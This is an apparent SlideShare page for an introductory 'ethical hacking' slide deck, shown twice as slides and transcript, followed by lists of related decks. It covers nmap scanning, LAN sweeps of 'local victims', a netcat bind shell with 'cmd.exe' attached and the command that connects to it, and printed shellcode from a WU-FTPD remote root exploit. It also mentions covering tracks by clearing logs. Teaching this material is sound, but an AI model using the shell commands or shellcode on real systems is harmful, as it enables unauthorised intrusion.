SlideShare a Scribd company logo
1 of 29
Download to read offline
Security & “Ethical”
     Hacking

         By:-Amanpreet Singh



  Presentation #1– Advanced Scanning & Exploitation
Introduction
   Again “Ethical” hacking

   Do you Sniff before you taste?

   Patience, persistence, some other motivational p
    word…

   Have phun, getting frustrated is normal
About Me
Overview
   Advanced scanning with NMAP (as seen
    in the Matrix)
   Local IP Sweeping & its importance
   Netcat rooting, a simple shell
   Identify Station ( operating system )
   Brief Exploit talk & Shell code
   Exploits via Jpgs, Pngs, Mp3s, etc.
   Conclusion
Advanced Scanning (NMAP)
   Ok, we have acquired an IP (or range of)
    and we want to find out some information
    about this system.

   We will use a very popular program
    named Nmap.

   Almost every Linux install its packaged,
    Windows you will need to download Nmap
    and the Win-Pcap files.
Advanced Scanning (NMAP)
   Lets look at some of the information
    techniques provided by nmap

SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags <flags>: Customize TCP scan flags
-sI <zombie host[:probeport]>: Idlescan
-sO: IP protocol scan
-b <ftp relay host>: FTP bounce scan


   We will be using another scan technique
    to probe open ports and determine
    service/versions in use: -sV
Advanced Scanning (NMAP)
   So lets run a -sV scan along with -v for verbose and -O
    for OS detection
Advanced Scanning (NMAP)
   So lots of gibberish, but we can sort
    through this for VERY important details!

   First: we have all of the open ports, along
    with what versions they are running! Port
    139.. Very interesting.

   Second: we also found out the operating
    system! Windows 98 SE… that will be
    later.
Protection from NMAP
   Keep those firewalls up if you’re not a
    server and you’re not hosting.

   There is not much you can do.. and NMAP
    can be extremely stealthy using advanced
    techniques.

   It is scary how much information can be
    acquired about you by a simple sniff and
    run.
Local IP Sweeping
   The LAN is the weakest network generally

   Open ports, open boxes, free IPs, easy
    sweeps

   Vast majority of people feel other
    computers within the LAN are not hackers,
    but compromise a wireless router & bam…
Using Angry IP Scanner Again!
   Angry IP Scanner; Its script kiddie, but it works
    very well, and is faster than NMAP

   Lets grab our local IP on the network, and begin
    our scan, so we are currently 192.168.5.100,
    and we know our range is 192.168.5.*

   Use Angry IP Scanner just to find available
    peers on the network, this is VERY useful for a
    compromised wireless router or compromised
    system on a router
We Have Local Victims!
   Okay, we have local victims, we can now
    use Nmap on each victim.

   Nmap will also bypass firewalls given
    enough time with the –P0 option.

   Once we know operating systems, open
    ports, we can use online security search
    tools such as www.securityfocus.com and
    locate exploits!
Importance of Local Sweeps
   Compromised routers = compromised
    systems, vulnerable on the inside only.

   Apply a full control root kit to a computer
    behind a router, and you have LAN
    access… hence local IP sweeping

   Viruses often spread within a network
    (commercial, government, etc.) using LAN
    sweeps
Netcat Rooting (Simple Shell)
   Ok, we want to see what kind of access a shell
    really has on a system.
       Shell referring to a command prompt window on
        another computer.


   Netcat is a very useful UDP/TCP raw
    client/server that can also double as a nice shell.

   A windows version is free to download, Linux
    generally comes with NC in the shell already.
Client/Server
   Determine which computer you want to have a
    shell on, and put nc.exe somewhere on there.

   Next run nc.exe with the following parameters:
       nc.exe –l –p 666 –e “cmd.exe”

   This will execute Netcat to listen on port 666,
    and when connected, it will execute and send
    the output of cmd.exe on the server.
Client Connection
   Client now connects to the server using
    the corresponding line:
            nc.exe 192.168.77.2 666

   And Viola! Netcat shell over the network.
Why Netcat Root?
   A nice way to make your first root, easy to
    expand on this.

   Potential is HUGE when the –e “???” command
    is used.

   Netcat is open source, so you can venture the
    source code to understand how exactly Netcat
    does this.

   This also works in Unix, just replace cmd.exe
    with a Unix shell ;)
Identify Station
   Continuation of Nmap OS discovery

   Once we have found a target, what kind of
    operating system is it running?

   Nmap -O command will usually show you,
    unless the computer has a firewall on.
Importance of OS ID
   Exploiting and choice of exploits/roots is always
    dependent on the type of OS

   Do we want to look for likely exploits, find a more
    aggressive approach, or leave it.
       For example, Linux servers often have a SSH server
        open, we can either nmap –sV and exploit, or try to
        bruteforce.

   Need to know what we are trying to hack,
    especially when cleaning up after a successful
    hack (log files, email reports of floods /
    bruteforce, rootkits, etc.)
Brief Exploits & Shell Code
   Exploits come in all sorts of languages &
    sizes. Some are simple run once on an IP,
    others have various options and offsets.

   Exploits are used as a way of getting into
    a system, shell code is what happens
    AFTER the exploit is successful.

   Shell code will always vary with
    experienced hackers, as they will always
    have useful shells on hand.
Example Shellcode used by WUFTPD
      2.6.0 REMOTE ROOT EXPLOIT
   char linuxcode[]= /* Lam3rZ chroot() code */
    "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb"
    "x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31"
    "xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27"
    "xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31"
    "xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d"
    "x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46"
    "x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8"
    "x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c"
    "x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
    "x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff"
    "x30x62x69x6ex30x73x68x31x2ex2ex31x31";

   This is machine code, used to give specific calls in Linux
    that will call chroot() and give the hacker a shell on the
    vulnerable system.

   This is public knowledge, just type the following in
    Google:
         wuftpd exploit filetype:c
More on Shells Later
   Creating shells is an entirely different topic, and
    we will go into how they actually figure out which
    machine code to use and where to inject this in a
    later presentation.

   Shells are scary to look at because if you do not
    know the machine code or the system its
    intended for, there is absolutely no way to know
    what its doing, but it can compromise a system!
Exploits via Jpg, Pngs, Mp3s
   Exploits come in many varieties, as it just
    takes a stray string call or a bad size
    check to make a program vulnerable.

   All sorts of formats have been vulnerable,
    for example the famous GDI+ Jpg
    vulnerability that would execute code just
    by viewing a jpg!
GDI+ Jpg vulnerability
Posted on Sept. 30, 2004
 “In the exploit attempts against AIM users, intruders post
  a copy of an infected JPEG image to their user profile
  and then send instant messages to other AIM users
  enticing them to view that profile. When someone views
  such a profile and the JPEG image loads the viewing
  user's computer is then infected.

  Still other exploits have been discovered. According to
  Symantec two other Trojans, “Moo” and
  “Backdoor.Roxe” are spreading although neither appears
  to have spread to more than 50 computers at the time of
  this writing.
Exploits via Jpg, Pngs, Mp3s
   Other vulnerabilities in the form of Pngs
    and Mp3s have come into the wild.

   One Mp3 would use the header to execute
    a shell in Winamp when the meta-data
    was loaded.

   A Png exploit in MSN Messenger would
    allow hackers to put shellcode in a Png
    and display it as a buddy icon to other
    users.
Just because its media…
   Just because you’re viewing a jpg, png,
    mp3, wmv, you could still be running
    something that exploits your computer.

   Many people think exploits come in very
    limited forms of scripts, tcp/udp injections
    or executables, but there are many ways
    in.
Resources
   If this type of information interests you, there are
    many safe online resources.

   www.hackthissite.org - a friendly playground for
    web hackers

   www.phrack.org - a very good place for random
    articles with great pieces of info

   www.securityfocus.com - some of the best up-to-
    date info about vulnerabilities and exploits.
Conclusion
   Again, I emphasize just because I’m showing
    you this, does NOT make it legal.
       In fact, scanning government systems with NMAP and
        getting caught can land you with fines & possible jail
        time. Running exploits with shellcode you do not trust
        could be potentially exposing your test system to a
        wild virus or backdoor you do not know about.

   Remember, finding exploits that work is tedious,
    not everything you find online works every time.
    Setup a fun box (something like Mandrake) and
    install some vulnerable software on there. See if
    you can break into it. Ex. Wuftpd 2.60. Have fun,
    it takes work so don’t give up!
Thank You For Your Time!

   Feel free to email me any
    questions/comments at


  Er.dehaljatt@gmail.com

More Related Content

What's hot

What's hot (20)

ShinoBOT Suite
ShinoBOT SuiteShinoBOT Suite
ShinoBOT Suite
 
Predicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group KeysPredicting and Abusing WPA2/802.11 Group Keys
Predicting and Abusing WPA2/802.11 Group Keys
 
From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13From Kernel Space to User Heaven #NDH2k13
From Kernel Space to User Heaven #NDH2k13
 
Nmap
NmapNmap
Nmap
 
Nmap Basics
Nmap BasicsNmap Basics
Nmap Basics
 
Port Scanning
Port ScanningPort Scanning
Port Scanning
 
Best!
Best!Best!
Best!
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
 
NMAP by Shrikant Antre & Shobhit Gautam
NMAP by Shrikant Antre & Shobhit GautamNMAP by Shrikant Antre & Shobhit Gautam
NMAP by Shrikant Antre & Shobhit Gautam
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
NMap
NMapNMap
NMap
 
Report on hacking blind
Report on hacking blindReport on hacking blind
Report on hacking blind
 
IDS & Passive Network Defense
IDS & Passive Network DefenseIDS & Passive Network Defense
IDS & Passive Network Defense
 
NMAP
NMAPNMAP
NMAP
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Module 3 Scanning
Module 3   ScanningModule 3   Scanning
Module 3 Scanning
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Aircrack
AircrackAircrack
Aircrack
 
Nmap
NmapNmap
Nmap
 

Similar to Security & ethical hacking

Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameJaime Sánchez
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
BackTrack5 - Linux
BackTrack5 - LinuxBackTrack5 - Linux
BackTrack5 - Linuxmariuszantal
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docxLaticiaGrissomzz
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Nmap basics-1198948509608024-3
Nmap basics-1198948509608024-3Nmap basics-1198948509608024-3
Nmap basics-1198948509608024-3Harsh Desai
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.pptshreyng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 

Similar to Security & ethical hacking (20)

Derevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse gameDerevolutionizing OS Fingerprinting: The cat and mouse game
Derevolutionizing OS Fingerprinting: The cat and mouse game
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
BackTrack5 - Linux
BackTrack5 - LinuxBackTrack5 - Linux
BackTrack5 - Linux
 
Hacking
HackingHacking
Hacking
 
Hacking
HackingHacking
Hacking
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
 
Hacking tutorial
Hacking tutorialHacking tutorial
Hacking tutorial
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Hacking In Detail
Hacking In DetailHacking In Detail
Hacking In Detail
 
Sectools
SectoolsSectools
Sectools
 
aaa
aaaaaa
aaa
 
Security Handbook
 Security Handbook Security Handbook
Security Handbook
 
OS Fingerprinting
OS FingerprintingOS Fingerprinting
OS Fingerprinting
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Nmap basics-1198948509608024-3
Nmap basics-1198948509608024-3Nmap basics-1198948509608024-3
Nmap basics-1198948509608024-3
 
Final project.ppt
Final project.pptFinal project.ppt
Final project.ppt
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Security tools
Security  toolsSecurity  tools
Security tools
 

Recently uploaded

Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfAijun Zhang
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024SkyPlanner
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Websitedgelyza
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UbiTrack UK
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDELiveplex
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxUdaiappa Ramachandran
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationIES VE
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaborationbruanjhuli
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URLRuncy Oommen
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPathCommunity
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8DianaGray10
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintMahmoud Rabie
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesMd Hossain Ali
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1DianaGray10
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxGDSC PJATK
 

Recently uploaded (20)

Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
COMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a WebsiteCOMPUTER 10 Lesson 8 - Building a Website
COMPUTER 10 Lesson 8 - Building a Website
 
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
UWB Technology for Enhanced Indoor and Outdoor Positioning in Physiological M...
 
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDEADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
ADOPTING WEB 3 FOR YOUR BUSINESS: A STEP-BY-STEP GUIDE
 
Building AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptxBuilding AI-Driven Apps Using Semantic Kernel.pptx
Building AI-Driven Apps Using Semantic Kernel.pptx
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online CollaborationCOMPUTER 10: Lesson 7 - File Storage and Online Collaboration
COMPUTER 10: Lesson 7 - File Storage and Online Collaboration
 
Designing A Time bound resource download URL
Designing A Time bound resource download URLDesigning A Time bound resource download URL
Designing A Time bound resource download URL
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8UiPath Studio Web workshop series - Day 8
UiPath Studio Web workshop series - Day 8
 
Empowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership BlueprintEmpowering Africa's Next Generation: The AI Leadership Blueprint
Empowering Africa's Next Generation: The AI Leadership Blueprint
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just MinutesAI Fame Rush Review – Virtual Influencer Creation In Just Minutes
AI Fame Rush Review – Virtual Influencer Creation In Just Minutes
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 

Security & ethical hacking

  • 1. Security & “Ethical” Hacking By:-Amanpreet Singh Presentation #1– Advanced Scanning & Exploitation
  • 2. Introduction  Again “Ethical” hacking  Do you Sniff before you taste?  Patience, persistence, some other motivational p word…  Have phun, getting frustrated is normal
  • 4. Overview  Advanced scanning with NMAP (as seen in the Matrix)  Local IP Sweeping & its importance  Netcat rooting, a simple shell  Identify Station ( operating system )  Brief Exploit talk & Shell code  Exploits via Jpgs, Pngs, Mp3s, etc.  Conclusion
  • 5. Advanced Scanning (NMAP)  Ok, we have acquired an IP (or range of) and we want to find out some information about this system.  We will use a very popular program named Nmap.  Almost every Linux install its packaged, Windows you will need to download Nmap and the Win-Pcap files.
  • 6. Advanced Scanning (NMAP)  Lets look at some of the information techniques provided by nmap SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan  We will be using another scan technique to probe open ports and determine service/versions in use: -sV
  • 7. Advanced Scanning (NMAP)  So lets run a -sV scan along with -v for verbose and -O for OS detection
  • 8. Advanced Scanning (NMAP)  So lots of gibberish, but we can sort through this for VERY important details!  First: we have all of the open ports, along with what versions they are running! Port 139.. Very interesting.  Second: we also found out the operating system! Windows 98 SE… that will be later.
  • 9. Protection from NMAP  Keep those firewalls up if you’re not a server and you’re not hosting.  There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques.  It is scary how much information can be acquired about you by a simple sniff and run.
  • 10. Local IP Sweeping  The LAN is the weakest network generally  Open ports, open boxes, free IPs, easy sweeps  Vast majority of people feel other computers within the LAN are not hackers, but compromise a wireless router & bam…
  • 11. Using Angry IP Scanner Again!  Angry IP Scanner; Its script kiddie, but it works very well, and is faster than NMAP  Lets grab our local IP on the network, and begin our scan, so we are currently 192.168.5.100, and we know our range is 192.168.5.*  Use Angry IP Scanner just to find available peers on the network, this is VERY useful for a compromised wireless router or compromised system on a router
  • 12. We Have Local Victims!  Okay, we have local victims, we can now use Nmap on each victim.  Nmap will also bypass firewalls given enough time with the –P0 option.  Once we know operating systems, open ports, we can use online security search tools such as www.securityfocus.com and locate exploits!
  • 13. Importance of Local Sweeps  Compromised routers = compromised systems, vulnerable on the inside only.  Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping  Viruses often spread within a network (commercial, government, etc.) using LAN sweeps
  • 14. Netcat Rooting (Simple Shell)  Ok, we want to see what kind of access a shell really has on a system.  Shell referring to a command prompt window on another computer.  Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell.  A windows version is free to download, Linux generally comes with NC in the shell already.
  • 15. Client/Server  Determine which computer you want to have a shell on, and put nc.exe somewhere on there.  Next run nc.exe with the following parameters: nc.exe –l –p 666 –e “cmd.exe”  This will execute Netcat to listen on port 666, and when connected, it will execute and send the output of cmd.exe on the server.
  • 16. Client Connection  Client now connects to the server using the corresponding line: nc.exe 192.168.77.2 666  And Viola! Netcat shell over the network.
  • 17. Why Netcat Root?  A nice way to make your first root, easy to expand on this.  Potential is HUGE when the –e “???” command is used.  Netcat is open source, so you can venture the source code to understand how exactly Netcat does this.  This also works in Unix, just replace cmd.exe with a Unix shell ;)
  • 18. Identify Station  Continuation of Nmap OS discovery  Once we have found a target, what kind of operating system is it running?  Nmap -O command will usually show you, unless the computer has a firewall on.
  • 19. Importance of OS ID  Exploiting and choice of exploits/roots is always dependent on the type of OS  Do we want to look for likely exploits, find a more aggressive approach, or leave it.  For example, Linux servers often have a SSH server open, we can either nmap –sV and exploit, or try to bruteforce.  Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)
  • 20. Brief Exploits & Shell Code  Exploits come in all sorts of languages & sizes. Some are simple run once on an IP, others have various options and offsets.  Exploits are used as a way of getting into a system, shell code is what happens AFTER the exploit is successful.  Shell code will always vary with experienced hackers, as they will always have useful shells on hand.
  • 21. Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT  char linuxcode[]= /* Lam3rZ chroot() code */ "x31xc0x31xdbx31xc9xb0x46xcdx80x31xc0x31xdb" "x43x89xd9x41xb0x3fxcdx80xebx6bx5ex31xc0x31" "xc9x8dx5ex01x88x46x04x66xb9xffxffx01xb0x27" "xcdx80x31xc0x8dx5ex01xb0x3dxcdx80x31xc0x31" "xdbx8dx5ex08x89x43x02x31xc9xfexc9x31xc0x8d" "x5ex08xb0x0cxcdx80xfexc9x75xf3x31xc0x88x46" "x09x8dx5ex08xb0x3dxcdx80xfex0exb0x30xfexc8" "x88x46x04x31xc0x88x46x07x89x76x08x89x46x0c" "x89xf3x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0" "x31xdbxb0x01xcdx80xe8x90xffxffxffxffxffxff" "x30x62x69x6ex30x73x68x31x2ex2ex31x31";  This is machine code, used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system.  This is public knowledge, just type the following in Google: wuftpd exploit filetype:c
  • 22. More on Shells Later  Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation.  Shells are scary to look at because if you do not know the machine code or the system its intended for, there is absolutely no way to know what its doing, but it can compromise a system!
  • 23. Exploits via Jpg, Pngs, Mp3s  Exploits come in many varieties, as it just takes a stray string call or a bad size check to make a program vulnerable.  All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!
  • 24. GDI+ Jpg vulnerability Posted on Sept. 30, 2004  “In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing.
  • 25. Exploits via Jpg, Pngs, Mp3s  Other vulnerabilities in the form of Pngs and Mp3s have come into the wild.  One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded.  A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.
  • 26. Just because its media…  Just because you’re viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer.  Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.
